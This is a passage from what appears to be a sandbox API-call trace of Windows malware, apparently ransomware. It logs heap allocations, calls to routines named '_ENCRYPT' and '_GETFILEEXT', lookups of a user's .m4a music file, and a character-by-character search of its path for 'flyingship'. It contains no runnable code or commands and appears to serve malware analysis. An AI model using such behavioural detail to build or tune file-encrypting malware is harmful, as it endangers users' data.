hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0185.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.643] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0185.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0185.644] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0185.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.644] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0185.644] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.680] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0185.680] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.680] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0185.681] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.681] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0185.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.681] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x3328d30, ftLastWriteTime.dwHighDateTime=0x1d5db32, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 0x90add8 [0185.681] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.682] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x3328d30, ftLastWriteTime.dwHighDateTime=0x1d5db32, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 0x90add8 [0185.682] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.682] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.685] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 